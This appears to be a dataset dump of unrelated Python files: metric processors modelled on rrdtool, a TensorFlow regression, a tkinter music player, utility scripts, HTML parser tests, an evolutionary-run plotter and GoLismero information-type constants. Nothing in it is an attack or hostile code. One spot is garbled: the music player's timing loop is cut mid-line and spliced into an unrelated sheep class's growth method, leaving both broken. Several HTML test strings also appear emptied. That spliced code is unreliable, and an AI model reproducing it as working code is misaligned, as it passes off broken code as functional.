update_pdp_prep case DST_ABSOLUTE\nclass AbsoluteMetricProcessor(FloatMetricProcessor):\n\n TYPE = config.VAL_ABSOLUTE\n\n #newval = rrd_strtodbl()\n #rate = newval / interval;\n\n def process(self, interval_seconds, last_raw_value, new_value):\n rate = None\n if interval_seconds is not None and new_value is not None:\n rate = new_value / interval_seconds\n return rate, None\n\n\n# See rrdtool/src/rrd_update.c update_pdp_prep case DST_GAUGE\nclass GaugeMetricProcessor(FloatMetricProcessor):\n\n TYPE = config.VAL_GAUGE\n\n #newval = rrd_strtodbl()\n #rate = newval;\n\n def process(self, interval_seconds, last_raw_value, new_value):\n rate = new_value\n return rate, None\n\n\n# See rrdtool/src/rrd_diff.c rrd_diff\nclass IntegerMetricProcessor(MetricProcessor):\n\n @classmethod\n def parse_value(cls, value):\n value = super(IntegerMetricProcessor, cls).parse_value(value)\n if value is not None and isinstance(value, float):\n # Truncate float value just like rrd_diff does\n value = int(value)\n return value\n\n def process(self, interval_seconds, last_raw_value, new_value):\n raise NotImplementedError()\n\n\n# See rrdtool/src/rrd_update.c update_pdp_prep case DST_COUNTER\n# rrd_diff.c rrd_diff\nclass CounterMetricProcessor(IntegerMetricProcessor):\n\n TYPE = config.VAL_COUNTER\n\n #pdp_new[ds_idx] = rrd_diff() [truncate floats]\n #if (pdp_new[ds_idx] < (double) 0.0)\n #pdp_new[ds_idx] += (double) 4294967295.0; /* 2^32-1 */\n #if (pdp_new[ds_idx] < (double) 0.0)\n #pdp_new[ds_idx] += (double) 18446744069414584320.0; /* 2^64-2^32 */\n #rate = pdp_new[ds_idx] / interval;\n\n def process(self, interval_seconds, last_raw_value, new_value):\n rate = None\n delta = None\n if last_raw_value is not None and new_value is not None:\n delta = new_value - last_raw_value\n if delta < 0:\n delta += 4294967295 # 2^32-1\n if delta < 0:\n delta += 18446744069414584320 # 2^64-2^32\n rate = delta / interval_seconds\n return rate, delta\n\n\n# See rrdtool/src/rrd_update.c update_pdp_prep case DST_DERIVE\n# rrd_diff.c rrd_diff\nclass DeriveMetricProcessor(IntegerMetricProcessor):\n\n TYPE = config.VAL_DERIVE\n\n #pdp_new[ds_idx] = rrd_diff() [truncate floats]\n #rate = pdp_new[ds_idx] / interval;\n\n def process(self, interval_seconds, last_raw_value, new_value):\n rate = None\n delta = None\n if last_raw_value is not None and new_value is not None:\n delta = new_value - last_raw_value\n if interval_seconds > 0:\n rate = delta / interval_seconds\n return rate, delta\n","sub_path":"rrdbot/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":5733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"636140656","text":"import numpy as np\nimport tensorflow as tf\n\nx = np.random.normal(0, 1, [1000, 1])\ny = 2*x + 1 + np.random.normal(0, 0.1, [1000, 1])\n\n\n# x, y\n# y = wx+b\n\nx_in = tf.placeholder(tf.float64, [5, 1])\ny_in = tf.placeholder(tf.float64, [5, 1])\nw = tf.Variable(np.random.random([1, 1]))\nb = tf.Variable(np.random.random([1]))\ny_out = tf.matmul(x_in, w) + b\nloss = tf.reduce_mean(tf.square(y_in - y_out))\n# ... \nstep = tf.train.GradientDescentOptimizer(0.1).minimize(loss)\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nfor itr in range(500):\n idx = np.random.randint(0, 1000, 5)\n #print(np.shape(x[idx]))\n sess.run(step, feed_dict={x_in:x[idx], y_in:y[idx]})\n if itr%10 == 0:\n print(sess.run([loss, w.value(), b.value()], feed_dict={x_in:x[idx], y_in:y[idx]}))","sub_path":"1.14_courses/Basic/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"30236144","text":"import os\r\nfrom tkinter import *\r\nimport tkinter.messagebox\r\nfrom pygame import mixer\r\nfrom mutagen.mp3 import MP3\r\nfrom tkinter import filedialog\r\nimport time\r\nimport threading\r\nfrom ttkthemes import themed_tk as tk\r\nfrom tkinter import ttk\r\n\r\n\r\n\r\n#root window contains the status bar\r\n''' the root contains both leeft and right frame.\r\nThe right frame contains top,middle and bottom frame.\r\nwhile the left frame contains the current playlist'''\r\nroot =tk.ThemedTk()\r\nroot.get_themes()\r\nroot.set_theme('black')\r\nroot.config(bg= 'grey')\r\nmixer.init() # intializing the mixer\r\n\r\n\r\nroot.title('Kio_studio')\r\nroot.iconbitmap(r'images/wave.ico')\r\n# root.geometry('300x300')\r\n\r\n# create the menu bar\r\nmenu_bar = Menu(root)\r\nroot.config(menu=menu_bar)\r\n# create submenu\r\nsub_menu = Menu(menu_bar, tearoff=0)\r\nmenu_bar.add_cascade(label='File', menu=sub_menu)\r\n\r\ndef browse_file():\r\n global filename_path\r\n filenames_path = filedialog.askopenfilenames()\r\n for i in filenames_path:\r\n filename_path= i\r\n add_to_playlist(filename_path)\r\n\r\n\r\nsub_menu.add_command(label='Open', command=browse_file)\r\nsub_menu.add_command(label='Exit', command=root.destroy)\r\n\r\n\r\n\r\nstatus_bar = ttk.Label(root, text='Welcome to Kio\\'s Studio', anchor=W, relief=SUNKEN, font=' Times 10')\r\nstatus_bar.pack(side=BOTTOM, fill=X)\r\n\r\n\r\nsub_menu = Menu(menu_bar, tearoff=0)\r\nmenu_bar.add_cascade(label='Help', menu=sub_menu)\r\n\r\ndef about_us():\r\n tkinter.messagebox.showinfo('About Us,This is an app built with python, that uses your music files on your local machine and plays them. You can visit the developers portfolio page for more info, philipcodes.pythonanywhere.com')\r\n\r\n\r\nsub_menu.add_command(label='About_Us', command=about_us)\r\n\r\n\r\n\r\n\r\n\r\nplaylist=[]\r\n# playlist contains the full path + the filename\r\n# current_playlist- contains just the filename\r\n# filepath contains where the file is and to be played\r\n\r\n\r\n\r\n\r\n\r\ndef add_to_playlist(filename):\r\n filename= os.path.basename(filename)\r\n index= 0\r\n current_playlist.insert(index, filename)\r\n playlist.insert(index,filename_path)\r\n index +=1\r\n\r\ndef delete_song():\r\n selected_song = current_playlist.curselection()\r\n\r\n selected_song = int(selected_song[0])\r\n current_playlist.delete(selected_song)\r\n playlist.pop(selected_song)\r\n\r\n\r\n\r\nleft_frame= Frame(root,background= 'grey')\r\nleft_frame.pack(side= LEFT, pady= 50)\r\n\r\ncurrent_playlist = Listbox(left_frame,background= 'grey')\r\ncurrent_playlist.pack()\r\n\r\nadd = ttk.Button(left_frame, text='Add', command= browse_file)\r\nadd.pack(side= LEFT)\r\n\r\ndel_but= ttk.Button(left_frame, text='Del', command= delete_song)\r\ndel_but.pack()\r\n\r\n\r\n\r\nright_frame=Frame(root, background= 'grey')\r\nright_frame.pack()\r\n\r\ntop_frame=Frame(right_frame,background= 'grey')\r\ntop_frame.pack(pady=30)\r\n\r\n\r\n\r\n\r\n\r\n\r\nmiddle = Frame(right_frame,background= 'grey',relief=SUNKEN)\r\nmiddle.pack(padx=30, pady=30)\r\ncurrent_time_label=ttk.Label(middle, text='Run Time- --:--', relief= GROOVE, font= 'Arial 10',background= 'grey')\r\ncurrent_time_label.grid(row=0, column= 0)\r\n\r\nlength_label = ttk.Label(middle, text='Total Length- --:--', relief= GROOVE, font= 'Arial 10',background= 'grey')\r\nlength_label.grid(row=0, column =2)\r\nplay_image = PhotoImage(file='images/interface (1).png')\r\n\r\n\r\ndef show_detail(play_song):\r\n file_data = os.path.splitext(play_song)\r\n\r\n\r\n if file_data[1] == '.mp3':\r\n audio = MP3(play_song)\r\n total_length = audio.info.length\r\n else:\r\n a = mixer.Sound(play_song)\r\n total_length = a.get_length()\r\n min,sec = divmod(total_length, 60)\r\n # it divides total_lenght by 60 and it returns and the mins and sec the reminder to sec\r\n min = round(min)\r\n sec = round(sec)\r\n time_format = '{:02d}:{:02d}'.format(min, sec)\r\n length_label['text'] = 'Total Length' + '- ' + time_format\r\n t1= threading.Thread(target=start_count, args=(total_length,))\r\n t1.start()\r\n\r\n\r\ndef start_count(t):\r\n global paused\r\n #Mixer.music stops the music, it returns false when we press pause button\r\n run_time= 0\r\n while run_time= self._food_need and water >= self._water_need:\r\n self._weight += self._growth_rate\r\n self._days_growing += 1\r\n self._update_status()\r\n\r\n","sub_path":"sheep_class.py","file_name":"sheep_class.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"472680084","text":"#=======================================================================#\n# USER NAME: Thach Le \n# FILE NAME: 061-piling-up.py\n# FILE PATH: /E/thach-working/hackerrank/python-skill/061-piling-up.py\n#=======================================================================#\n# import library\nfrom collections import deque\n\ndef main():\n\tfor _ in range(int(input())):\n\t\t_, lst_input = input(), list(map(int, input().split()))\n\t\tmin_idex = lst_input.index(min(lst_input))\n\t\tleft = lst_input[:min_idex]\n\t\tright = lst_input[min_idex:]\n\t\tprint(\"Yes\" if left == sorted(left, reverse=True) and right == sorted(right) else \"No\")\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"python-skill/061-piling-up-hackerrank.py","file_name":"061-piling-up-hackerrank.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"2644724","text":"\"\"\"\r\nAuthor: Nguyen Tan Loc\r\nDate: 7/10/2021\r\nProblem:\r\nWrite a program that inputs a text file. The program should print the unique\r\nwords in the file in alphabetical order.\r\n\r\nSolution:\r\n\r\n ....\r\n\"\"\"\r\nunique = []\r\n\r\nwith open(\"bai.txt\", \"r\") as file:\r\n lines = file.readlines()\r\n for line in lines:\r\n words = line.split()\r\n for word in words:\r\n word = word.strip()\r\n if word not in unique:\r\n unique.append(word)\r\nunique = sorted(unique)\r\nprint(unique)","sub_path":"NguyenTanLoc_43807_CH05/project/5.7/Page_166_Project_07.py","file_name":"Page_166_Project_07.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"59228557","text":"import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nfname = 'thumbsup'\ncmap = 'gist_stern'\nt1 = mpimg.imread('t'+fname+'.jpg')\nfig = plt.figure(frameon=False)\nax = plt.Axes(fig,[0.,0.,1.,1.])\nax.set_axis_off()\nfig.add_axes(ax)\nax.imshow(t1[:,:,0],cmap=cmap)\nfig.savefig('T2'+fname+'.png',bbox_inches='tight',pad_inches=0)\n","sub_path":"submission/dtrumpimg.py","file_name":"dtrumpimg.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"351960172","text":"\n# **** Warren's App Engine Toolkit (WAET), version 1.2.0\n#\n# These are functions and procedures used for augmenting Google App Engine. Unfortunately, they have\n# to be inline with the rest of the code due to Python's TERRIBLE import and include functionality. Sorry.\n\n# Bring in Warren's App Engine Toolkit\n#from waet1_2_1 import clientscreenunit\n#from waet1_2_1 import limit_to_length\n#from waet1_2_1 import dropdownfromset\n#from waet1_2_1 import parseit\n#from waet1_2_1 import coolprint\n#from waet1_2_1 import coolscan\n\nclass clientscreenunit:\n def __init__(self, displayname, emailaddress, fullname, leadinghtml, lagginghtml):\n \"\"\"Class for passing all the relevant data to the client screen\n (Required since App Engine is on Django 0.96. This wouldn't be necessary in a later version of Django)\"\"\"\n \n self.displayname = displayname\n self.emailaddress = emailaddress\n self.fullname = fullname\n self.leadinghtml = leadinghtml\n self.lagginghtml = lagginghtml\n pass \n\ndef limit_to_length(strinput, length_to_limit):\n \"limit a string to a given length\" \n \n stroutput = strinput\n if len(strinput) > length_to_limit:\n stroutput = strinput[:length_to_limit]\n return stroutput\n\n\ndef dropdownfromset(settouse, selectedvalue, idtouse):\n \"build an HTML drop down from a Python set\"\n \n strtemp = \"\"\n return strtemp\n\n\n\ndef parseit(full_string, find_string, parameters):\n \"\"\"Function for finding a string inside of another string\n Parameters:\n 'rfi' = right-hand part of the string, first instance of sub-string, inclusive of the target string (DEFAULT)\n 'rfx' = right-hand part of the string, first instance of sub-string, exclusive of target\n 'rli' = right-hand part of the string, last instance of sub-string, inclusive of the target string\n 'rlx' = right-hand part of the string, last instance of sub-string, exclusive of target\n 'lfi' = left-hand part of the string, first instance of sub-string, inclusive of the target string\n 'lfx' = left-hand part of the string, first instance of sub-string, exclusive of target\n 'lli' = left-hand part of the string, last instance of sub-string, inclusive of the target string\n 'llx' = left-hand part of the string, last instance of sub-string, exclusive of target\"\"\"\n if parameters == 'rfx':\n return_string = full_string[full_string.find(find_string)+len(find_string):]\n elif parameters == 'rli':\n return_string = full_string[full_string.rfind(find_string):]\n elif parameters == 'rlx':\n return_string = full_string[full_string.rfind(find_string)+len(find_string):]\n elif parameters == 'lfi':\n return_string = full_string[:full_string.find(find_string)+len(find_string)]\n elif parameters == 'lfx':\n return_string = full_string[:full_string.find(find_string)]\n elif parameters == 'lli':\n return_string = full_string[:full_string.rfind(find_string)+len(find_string)]\n elif parameters == 'llx':\n return_string = full_string[:full_string.rfind(find_string)]\n else:\n return_string = full_string[full_string.find(find_string):]\n return return_string\n \n\ndef tween(full_string, find_string_left = \"\", find_string_right = \"\"):\n \"\"\"Function for finding a string inside of another string. Use blank string in indicate first or last of the string.\"\"\"\n if find_string_left == '' or find_string_left == None:\n return_string = full_string[:full_string.find(find_string_right)] \n elif find_string_right == '' or find_string_right == None:\n return_string = full_string[full_string.find(find_string_left)+len(find_string_left):] \n else:\n new_full_string = full_string[full_string.find(find_string_left)+len(find_string_left):] \n return_string = new_full_string[:new_full_string.find(find_string_right)] \n return return_string\n\n\ndef coolprint (what_number, places):\n \"Function for printing numbers in a cool way (i.e. '3.2M' = 3,200,000; '1.1B' = 1,100,000,000, etc.)\"\n try:\n first_attempt = float(what_number)\n except (ValueError):\n what_number = 0\n\n if abs(what_number) > 1000000000:\n return_string = str(round(float(what_number)/1000000000,places)) + \"B\"\n elif abs(what_number) > 1000000:\n return_string = str(round(float(what_number)/1000000,places)) + \"M\"\n elif abs(what_number) > 1000:\n return_string = str(round(float(what_number)/1000,places)) + \"K\"\n else:\n return_string = str(round(float(what_number),places))\n return return_string\n\n\n\ndef coolscan(string_to_scan):\n \"Function that acts as a semi-inverse to coolprint. This function interprets a coolprint number back to a floating point\"\n \n strtemp = string_to_scan.strip()\n isDone = False\n if len(strtemp) < 1:\n what_number = 0\n isDone = True\n\n iNegative = 1\n if strtemp[len(strtemp)-1] == \"(\":\n iNegative = -1\n strtemp2 = strtemp[1:]\n strtemp = strtemp2\n if strtemp[len(strtemp)-1] == \"-\":\n iNegative = -1\n strtemp2 = strtemp[1:]\n strtemp = strtemp2\n \n if isDone == False:\n if strtemp[len(strtemp)-1] == \"B\":\n try:\n what_number = iNegative * float(strtemp[:len(strtemp)-1]) * 1000000000\n except (ValueError):\n what_number = 0\n elif strtemp[len(strtemp)-1] == \"M\":\n try:\n what_number = iNegative * float(strtemp[:len(strtemp)-1]) * 1000000\n except (ValueError):\n what_number = 0\n elif strtemp[len(strtemp)-1] == \"K\":\n try:\n what_number = iNegative * float(strtemp[:len(strtemp)-1]) * 1000\n except (ValueError):\n what_number = 0\n else:\n try:\n what_number = iNegative * float(strtemp[:len(strtemp)-1])\n except (ValueError):\n what_number = 0 \n return what_number\n\n\n# **** \n# Warren's App Engine Toolkit (WAET)\n# END ","sub_path":"waet1_2_0.py","file_name":"waet1_2_0.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"158960176","text":"import sys\nimport io\n\nimport pytest\n\nfrom ..parser import HabrParser\n\n\nclass TestHabrParser:\n parser = HabrParser()\n file = None\n\n testdata_forbidden_tags = [\n ('script'), ('style')\n ]\n\n testdata_parsedata = [\n ('',\n [''], []),\n ('',\n [''], []),\n ('whoami',\n ['whoami™'], []),\n ('<i>',\n ['<i>'], [''])\n ]\n\n @pytest.mark.parametrize(\"tag\", testdata_forbidden_tags)\n def test_inside_forbidden_tag(self, tag):\n self.parser.file = sys.stdout\n # Dummy data - needed to avoid Exception on get_starttag_text\n self.parser.feed('')\n\n self.parser.handle_starttag(tag, [])\n assert self.parser.inside_forbidden_tag\n self.parser.handle_endtag(tag)\n assert not self.parser.inside_forbidden_tag\n\n @pytest.mark.parametrize(\"html, expected_contains, expected_contains_not\", testdata_parsedata)\n def test_parse_data(self, html, expected_contains, expected_contains_not):\n output_buffer = io.StringIO()\n self.parser.set_output_buffer(output_buffer)\n\n self.parser.feed(html)\n\n output_buffer.seek(0)\n\n for substring in expected_contains:\n assert substring in output_buffer.read()\n\n for substring in expected_contains_not:\n assert substring not in output_buffer.read()\n\n output_buffer.close()\n","sub_path":"proxy/tests/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"325849097","text":"import heapq\nimport os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom data import DataManager\nfrom src.Analysis import Logger\n\n\"\"\"\nfile which reads generation by generation data containing info on the \naccuracy of every evaluated network, as well as their scores on subsequent objectives.\n\nData plotter aggregates each generations scores into one, either by using max, or average, or average of the top n\nData plotter then plots these aggregated scores at each generation for multiple runs\n\"\"\"\n\nplot = None\n\n\ndef plot_objectives_at_gen(generation):\n if len(Logger.generations) <= generation:\n return\n generation = Logger.generations[generation]\n acc = generation.accuracies\n second = generation.second_objective_values\n third = generation.third_objective_values\n\n if second is None or len(second) == 0:\n plot_histogram(acc)\n elif third is None or len(third) == 0:\n plot_acc_vs_second(acc, second)\n else:\n pass\n\n\ndef plot_acc_vs_second(acc, second):\n global plot\n plt.scatter(acc, second)\n plt.show()\n\n\ndef plot_histogram(acc):\n plt.hist(acc, bins=20)\n plt.show()\n\n\ndef plot_generations():\n for generation in Logger.generations:\n plot_objectives_at_gen(generation.generation_number)\n\n\ndef get_gens_and_fitnesses(aggregation_type='max', fitness_index=0, num_top=5):\n gens = list(range(0, len(Logger.generations)))\n if aggregation_type == 'max':\n fitness = [gen.get_max_of_objective(fitness_index) for gen in Logger.generations]\n elif aggregation_type == 'avg':\n fitness = [gen.get_average_of_objective(fitness_index) for gen in Logger.generations]\n elif aggregation_type == 'top':\n fitness = []\n for gen in Logger.generations:\n fitness.append(sum(heapq.nlargest(num_top, gen.objectives[fitness_index])) / num_top)\n else:\n raise ValueError('Only aggregation types allowed are avg and max, received' + str(aggregation_type))\n\n return gens, fitness\n\n\ndef plot_all_generations(aggregation_type='max', fitness_index=0, run_name='unnamed run'):\n gens, fitness = get_gens_and_fitnesses(aggregation_type, fitness_index)\n\n plt.ylim(0, 100)\n plt.scatter(gens, fitness)\n plt.plot(np.unique(gens), np.poly1d(np.polyfit(gens, fitness, 1))(np.unique(gens)))\n plt.title(aggregation_type + ' value of objectives ' + str(fitness_index) + ' per generation for ' + run_name)\n plt.show()\n\n\ndef get_all_run_names():\n runs = set()\n for subdir, dirs, files in os.walk(os.path.join(DataManager.get_data_folder(), \"runs\")):\n sub = subdir.split(\"runs\")[1][1:].split(\"\\\\\")[0].split(\"/\")[0]\n if sub == \"\":\n continue\n runs.add(sub)\n\n return runs\n\n\ndef get_all_runs(aggregation_type='max', num_top=5, fitness_index=0, max_gens=1000):\n runs = get_all_run_names()\n\n runs_data = {}\n\n for run in runs:\n try:\n Logger.load_date_from_log_file(run, summary=False)\n gens, fitness = get_gens_and_fitnesses(aggregation_type, fitness_index, num_top=num_top)\n if len(gens) > max_gens:\n gens = gens[:max_gens]\n fitness = fitness[:max_gens]\n\n runs_data[run] = (gens, fitness)\n except:\n pass\n\n return runs_data\n\n\ndef get_run_groups(aggregation_type='max', num_top=5, fitness_index=0, max_gens=1000, include_deterministic_runs=True,\n include_cross_species_runs=True):\n runs = get_all_runs(aggregation_type=aggregation_type, num_top=num_top, fitness_index=fitness_index,\n max_gens=max_gens)\n groups = {}\n for run in runs.keys():\n group_run_name = get_run_group_name(run, include_deterministic_runs, include_cross_species_runs)\n if group_run_name not in groups:\n groups[group_run_name] = []\n groups[group_run_name].append(runs[run])\n\n return groups\n\n\ndef get_run_group_name(run_name, include_deterministic_runs=True, include_cross_species_runs=True):\n run_name = run_name.replace(\"da\", \"$\")\n\n group_run_name = run_name.replace(\"_d\", \"\") if include_deterministic_runs else run_name\n group_run_name = group_run_name.replace(\"_c\", \"\") if include_cross_species_runs else group_run_name\n\n group_run_name = group_run_name.replace(\"$\", \"da\")\n\n if group_run_name[-1].isdigit():\n group_run_name = group_run_name[:-1]\n\n if group_run_name in name_overrides:\n return name_overrides[group_run_name]\n\n return group_run_name\n\n\ndef get_run_boundries(aggregation_type='max', num_top=5, fitness_index=0, max_gens=1000,\n include_deterministic_runs=True, smooth_boundries=True):\n run_groups = get_run_groups(aggregation_type=aggregation_type, num_top=num_top, fitness_index=fitness_index,\n max_gens=max_gens, include_deterministic_runs=include_deterministic_runs)\n boundires = {}\n counts = {}\n\n for group_name in run_groups.keys():\n group = run_groups[group_name]\n fitnesses = [f for (g, f) in group]\n\n if len(fitnesses) < 2:\n \"\"\"need at least 2 runs to get boundires\"\"\"\n continue\n \"\"\"can get a boundry up till the second longest run, need 2 for a boundry\"\"\"\n max_num_gens = len(sorted(fitnesses, key=lambda x: len(x))[-2])\n mins = []\n maxes = []\n\n for i in range(max_num_gens):\n elements = [x[i] for x in fitnesses if len(x) > i]\n mins.append(min(elements))\n maxes.append(max(elements))\n\n if smooth_boundries:\n mins = get_rolling_averages(mins)\n maxes = get_rolling_averages(maxes)\n\n boundires[group_name] = (mins, maxes)\n counts[group_name] = len(group)\n return boundires, counts\n\n\ndef plot_all_runs(aggregation_type='max', num_top=5, fitness_index=0, max_gens=1000, show_data=False,\n stay_at_max=True, line_graph=True, show_best_fit=False, show_smoothed_data=False,\n show_boundires=True, smooth_boundries=True, show_data_in_boundries=True,\n colour_group_run_lines_same=True):\n colours = {}\n if show_boundires:\n boundires, counts = get_run_boundries(aggregation_type=aggregation_type, num_top=num_top,\n fitness_index=fitness_index, max_gens=max_gens,\n smooth_boundries=smooth_boundries)\n for group_name in boundires.keys():\n mins, maxs = boundires[group_name]\n gens = [x for x in range(len(mins))]\n\n plot = plt.fill_between(gens, mins, maxs, alpha=0.4, label=group_name + \", n=\" + repr(counts[group_name]))\n colours[group_name] = [max(min(x * 1.5, 1), 0) for x in plot.get_facecolor()[0]]\n\n runs = get_all_runs(aggregation_type=aggregation_type, num_top=num_top, fitness_index=fitness_index,\n max_gens=max_gens)\n labels_used = set()\n for run in runs.keys():\n if show_boundires and not show_data_in_boundries:\n group_name = get_run_group_name(run)\n if group_name in boundires:\n continue\n gens, fitness = runs[run]\n\n aggregated = None\n if stay_at_max:\n aggregated = [max(fitness[:i + 1]) for i in range(len(fitness))]\n elif show_best_fit:\n gens = np.unique(gens)\n aggregated = np.poly1d(np.polyfit(gens, fitness, 1))(np.unique(gens))\n elif show_smoothed_data:\n aggregated = get_rolling_averages(fitness)\n group_name = get_run_group_name(run)\n colour = None\n if colour_group_run_lines_same:\n if show_boundires and show_data_in_boundries:\n if group_name in colours:\n colour = colours[group_name]\n if show_data:\n if colour_group_run_lines_same:\n label = group_name if group_name not in labels_used else None\n labels_used.add(label)\n else:\n label = run\n\n if line_graph:\n p = plt.plot(gens, fitness, label=label, c=colour)\n else:\n p = plt.scatter(gens, fitness, label=label, c=colour)\n if aggregated is not None:\n plt.plot(gens, aggregated, c=p[0].get_color())\n\n else:\n if aggregated is not None:\n plt.plot(gens, aggregated, label=run, c=colour)\n\n handles, labels = plt.gca().get_legend_handles_labels()\n plt.gca().legend(handles, labels)\n\n plt.set_cmap('gray')\n\n plt.xlabel(\"Generation\")\n ylabel = \"fitness \" + repr(fitness_index) if fitness_index > 0 else \"accuracy (%)\"\n plt.ylabel(ylabel)\n title = aggregation_type + (\" \" + repr(num_top) if aggregation_type == \"top\" else \"\") + \" fitness\"\n plt.title(\"Top 5 accuracy of base and ModMax\")\n\n # plt.show()\n plt.savefig('MMvsBase', dpi=300)\n\n\ndef get_rolling_averages(data, alpha=0.65):\n smoothed = []\n for point in data:\n if len(smoothed) == 0:\n smoothed.append(point)\n else:\n a = alpha if len(smoothed) > 10 else pow(alpha, 1.5)\n smooth = smoothed[-1] * a + point * (1 - a)\n smoothed.append(smooth)\n return smoothed\n\n\nname_overrides = {\"mm\": \"Modmax cdn\", \"mms\": \"Elite cdn\", \"mms_10E\": \"Elite cdn 10E\", \"base\": \"cdn\",\n \"base_10E\": \"cdn 10E\", \"spc\": \"SPCDN\", \"base_da\": \"DACDN\", \"mms_da\": \"Elite DACDN\",\n \"max\": \"max fitness aggregation cdn\", \"modret\": \"module retention cdn\",\n \"mm_globmut\": \"ModMax with Global Mutation Adjustment\",\n \"mms_globmut\": \"Elite cdn with Global Mutation Adjustment\",\n \"mm_breed\": \"ModMax cdn with Node Breeding\", \"mms_breed\": \"Elite cdn with Node Breeding\"}\n\nif __name__ == \"__main__\":\n # style.use('fivethirtyeight')\n plot_all_runs(aggregation_type=\"top\", num_top=5, show_data=True, show_best_fit=False, show_smoothed_data=False,\n stay_at_max=False, show_boundires=True, smooth_boundries=False, show_data_in_boundries=True,\n colour_group_run_lines_same=True, max_gens=30)\n","sub_path":"src/Analysis/EvolutionaryDataPlotter.py","file_name":"EvolutionaryDataPlotter.py","file_ext":"py","file_size_in_byte":10172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"494175485","text":"li = list(map(int, input().split()))\r\n\r\nascending = [1, 2, 3, 4, 5, 6, 7, 8]\r\ndescending = [8, 7, 6, 5, 4, 3, 2, 1]\r\nif li == ascending:\r\n print('ascending')\r\nelif li == descending:\r\n print('descending')\r\nelse:\r\n print('mixed')\r\n","sub_path":"week1/1/1-1_신예준_20210705.py","file_name":"1-1_신예준_20210705.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"51493368","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport utils.widgets\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('clients', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='client',\n name='phone_cell',\n field=utils.widgets.PhoneNumberField(blank=True, default='', max_length=20, verbose_name='Cell Phone'),\n ),\n migrations.AlterField(\n model_name='client',\n name='phone_home',\n field=utils.widgets.PhoneNumberField(blank=True, default='', max_length=20, verbose_name='Home Phone'),\n ),\n migrations.AlterField(\n model_name='client',\n name='phone_work',\n field=utils.widgets.PhoneNumberField(blank=True, default='', max_length=20, verbose_name='Work Phone'),\n ),\n ]\n","sub_path":"irsexpress2/apps/clients/migrations/0002_auto_20151210_0937.py","file_name":"0002_auto_20151210_0937.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"318936938","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nInformation types.\n\"\"\"\n\n__license__ = \"\"\"\nGoLismero 2.0 - The web knife - Copyright (C) 2011-2013\n\nAuthors:\n Daniel Garcia Garcia a.k.a cr0hn | cr0hn<@>cr0hn.com\n Mario Vilas | mvilas<@>gmail.com\n\nGolismero project site: https://github.com/golismero\nGolismero project mail: golismero.project<@>gmail.com\n\nThis program is free software; you can redistribute it and/or\nmodify it under the terms of the GNU General Public License\nas published by the Free Software Foundation; either version 2\nof the License, or (at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program; if not, write to the Free Software\nFoundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\"\"\"\n\n__all__ = [\"Information\"]\n\nfrom .. import Data\n\n\n#------------------------------------------------------------------------------\nclass Information(Data):\n \"\"\"\n Base class for informational results.\n \"\"\"\n\n\n #--------------------------------------------------------------------------\n #\n # Types of Infomation results\n #\n #--------------------------------------------------------------------------\n\n INFORMATION_UNKNOWN = 0 # Not a real value!\n\n # Data\n INFORMATION_HTML = 1000 # HTML source code\n INFORMATION_FORM = 1001 # HTML form\n INFORMATION_PLAIN_TEXT = 1002 # Text file\n INFORMATION_BINARY = 1003 # Binary file of unknown type\n ##INFORMATION_EXECUTABLE = 1004 # Executable file (various platforms)\n ##INFORMATION_IMAGE = 1005 # Image file\n ##INFORMATION_VIDEO = 1006 # Video file\n ##INFORMATION_PDF = 1007 # PDF file\n ##INFORMATION_FLASH = 1008 # Flash file\n ##INFORMATION_DOCUMENT = 1009 # Document file (various formats)\n\n # Assets\n INFORMATION_USERNAME = 1100 # Username\n INFORMATION_PASSWORD = 1101 # Password\n ##INFORMATION_DATABASE_DUMP = 1102 # Database dump in SQL format\n\n # Protocol captures\n INFORMATION_HTTP_REQUEST = 1200 # HTTP request\n INFORMATION_HTTP_RAW_REQUEST = 1201 # Raw HTTP request\n INFORMATION_HTTP_RESPONSE = 1202 # HTTP response\n INFORMATION_DNS_REGISTER = 1212 # DNS responses\n\n # Fingerprints\n INFORMATION_WEB_SERVER_FINGERPRINT = 1300 # HTTP server fingerprint\n ##INFORMATION_WEB_APP_FINGERPRINT = 1301 # Web application fingerprint\n ##INFORMATION_SERVICE_FINGERPRINT = 1302 # Network service fingerprint\n INFORMATION_OS_FINGERPRINT = 1303 # Operating system fingerprint\n 